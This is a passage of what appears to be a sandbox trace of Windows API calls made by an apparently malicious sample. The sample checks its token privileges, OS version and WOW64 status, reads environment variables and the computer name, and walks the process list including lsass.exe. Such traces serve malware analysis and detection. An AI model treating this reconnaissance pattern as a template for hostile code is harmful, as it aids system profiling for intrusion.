returned 4 [0205.651] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x627fd28, cbMultiByte=-1, lpWideCharStr=0x627fd48, cchWideChar=32 | out: lpWideCharStr="fdircmne") returned 9 [0205.651] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x1b) returned 0x6281798 [0205.651] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x627f770 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.651] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.652] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.652] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.652] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.652] lstrlenW (lpString="䉁䑃䙅ؠ") returned 4 [0205.652] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.652] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.652] GetCurrentProcess () returned 0xffffffff [0205.652] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x607edbc | out: TokenHandle=0x607edbc*=0x268) returned 1 [0205.652] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x607ed9c | out: TokenInformation=0x0, ReturnLength=0x607ed9c) returned 0 [0205.652] GetLastError () returned 0x7a [0205.652] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x14) returned 0x6281798 [0205.652] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x19, TokenInformation=0x6281798, TokenInformationLength=0x14, ReturnLength=0x607edb4 | out: TokenInformation=0x6281798, ReturnLength=0x607edb4) returned 1 [0205.652] GetSidSubAuthorityCount (pSid=0x62817a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x62817a1 [0205.652] GetSidSubAuthority (pSid=0x62817a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x62817a8 [0205.652] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.652] CloseHandle (hObject=0x268) returned 1 [0205.652] GetVersionExA (in: lpVersionInformation=0x627fc78*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x627fc78*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0205.652] GetCurrentProcess () returned 0xffffffff [0205.652] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x607edbc | out: Wow64Process=0x607edbc*=1) returned 1 [0205.652] GetWindowsDirectoryW (in: lpBuffer=0x6280c98, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0205.652] GetNumberFormatA (in: Locale=0x7d3, dwFlags=0xb4, lpValue="electricmadness", lpFormat=0x0, lpNumberStr=0x607ed54, cchNumber=34 | out: lpNumberStr="") returned 0 [0205.652] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x16) returned 0x6281798 [0205.652] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x607f58c, nSize=0x104 | out: lpBuffer="") returned 0xa [0205.653] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.653] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x62810ac, nSize=0x209 | out: lpBuffer="") returned 0x15 [0205.653] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x6280ea2, nSize=0x20a | out: lpBuffer="") returned 0x24 [0205.653] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x607f798, nSize=0x40 | out: lpBuffer="") returned 0x2 [0205.653] GetComputerNameW (in: lpBuffer=0x6281614, nSize=0x607f820 | out: lpBuffer="XC64ZB", nSize=0x607f820) returned 1 [0205.653] lstrlenW (lpString="䉁䑃䙅眑ԁ褡￾ÿ؇䚥R؇") returned 14 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.653] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅眑") returned 4 [0205.654] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.654] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.654] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.654] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.654] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.655] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.656] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.656] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.656] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.656] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.656] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x2d) returned 0x6281798 [0205.656] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f770 [0205.656] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x62817d0 [0205.656] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x13) returned 0x62817e8 [0205.656] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6281808 [0205.656] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.656] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x26) returned 0x6281798 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6281820 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6281838 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6281850 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6281868 [0205.657] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6281798 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x62817b0 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6281880 [0205.657] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6281798 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x62817c0 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6281898 [0205.657] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x14) returned 0x62818b0 [0205.657] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x6281798 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x62818d0 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x62818e0 [0205.658] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62818b0 | out: hHeap=0x6200000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x12) returned 0x62818b0 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x62818f8 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x9) returned 0x6281908 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x9) returned 0x6281920 [0205.658] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62818b0 | out: hHeap=0x6200000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x25) returned 0x6281938 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x62818b0 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6281968 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x6281980 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x6281998 [0205.658] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281938 | out: hHeap=0x6200000) returned 1 [0205.658] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x53) returned 0x627f008 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x18) returned 0x6281938 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f068 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x627f0c0 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x10) returned 0x627f258 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f1b0 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x10) returned 0x627f180 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f138 [0205.662] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f008 | out: hHeap=0x6200000) returned 1 [0205.662] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x2f) returned 0x627f008 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f108 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x15) returned 0x627f040 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f270 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f210 [0205.663] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f008 | out: hHeap=0x6200000) returned 1 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x3e) returned 0x627f288 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x10) returned 0x627f240 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x627f1c8 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f0d8 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x14) returned 0x627f008 [0205.663] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xf) returned 0x627f228 [0205.664] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f288 | out: hHeap=0x6200000) returned 1 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xf) returned 0x627f0a8 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x6281958 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xf) returned 0x627f0f0 [0205.664] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f0a8 | out: hHeap=0x6200000) returned 1 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x9) returned 0x627f120 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f028 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x9) returned 0x627f0a8 [0205.664] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f120 | out: hHeap=0x6200000) returned 1 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x22) returned 0x627f288 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f120 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xa) returned 0x627f168 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x627f150 [0205.664] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f198 [0205.664] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f288 | out: hHeap=0x6200000) returned 1 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x627f1e0 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f288 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x627f1f8 [0205.665] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f1e0 | out: hHeap=0x6200000) returned 1 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x1c) returned 0x627f298 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x627f2c0 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x10) returned 0x627f1e0 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6200960 [0205.665] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f298 | out: hHeap=0x6200000) returned 1 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x9) returned 0x6200b28 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f298 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x9) returned 0x6200ba0 [0205.665] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200b28 | out: hHeap=0x6200000) returned 1 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x2b) returned 0x627f2d0 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6200a98 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6200ac8 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x10) returned 0x6200a20 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x6200bb8 [0205.665] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2d0 | out: hHeap=0x6200000) returned 1 [0205.665] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x72) returned 0x627f2d0 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x14) returned 0x627f350 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x18) returned 0x627f370 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x19) returned 0x627f390 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x12) returned 0x627f3b8 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x20) returned 0x627f3d8 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xf) returned 0x6200978 [0205.666] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2d0 | out: hHeap=0x6200000) returned 1 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x25) returned 0x627f2d0 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f2a8 [0205.666] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x25) returned 0x627f300 [0205.667] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2d0 | out: hHeap=0x6200000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x2a) returned 0x627f400 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x62008e8 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x62009f0 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x6200b28 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x11) returned 0x627f330 [0205.667] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f400 | out: hHeap=0x6200000) returned 1 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x2a) returned 0x627f400 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x627f2d0 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x14) returned 0x627f2e0 [0205.667] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x16) returned 0x627f438 [0205.668] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f400 | out: hHeap=0x6200000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xa) returned 0x6200990 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f400 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xa) returned 0x6200ab0 [0205.668] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200990 | out: hHeap=0x6200000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6200a38 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f410 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x6200900 [0205.668] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200a38 | out: hHeap=0x6200000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x62008d0 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627f420 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x6200990 [0205.668] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62008d0 | out: hHeap=0x6200000) returned 1 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x1f) returned 0x627f458 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x6200d00 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xe) returned 0x62009a8 [0205.668] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x11) returned 0x627f480 [0205.668] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f458 | out: hHeap=0x6200000) returned 1 [0205.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x268 [0205.680] Process32First (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.681] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x20) returned 0x627f458 [0205.681] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f458 | out: hHeap=0x6200000) returned 1 [0205.681] Sleep (dwMilliseconds=0xa) [0205.706] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.707] Sleep (dwMilliseconds=0xa) [0205.722] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.722] Sleep (dwMilliseconds=0xa) [0205.738] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.739] Sleep (dwMilliseconds=0xa) [0205.757] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.758] Sleep (dwMilliseconds=0xa) [0205.780] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.782] Sleep (dwMilliseconds=0xa) [0205.801] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.802] Sleep (dwMilliseconds=0xa) [0205.817] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.818] Sleep (dwMilliseconds=0xa) [0205.849] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.852] Sleep (dwMilliseconds=0xa) [0205.880] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.881] Sleep (dwMilliseconds=0xa) [0205.894] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.894] Sleep (dwMilliseconds=0xa) [0205.910] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.911] Sleep (dwMilliseconds=0xa) [0205.925] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.926] Sleep (dwMilliseconds=0xa) [0205.948] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.949] Sleep 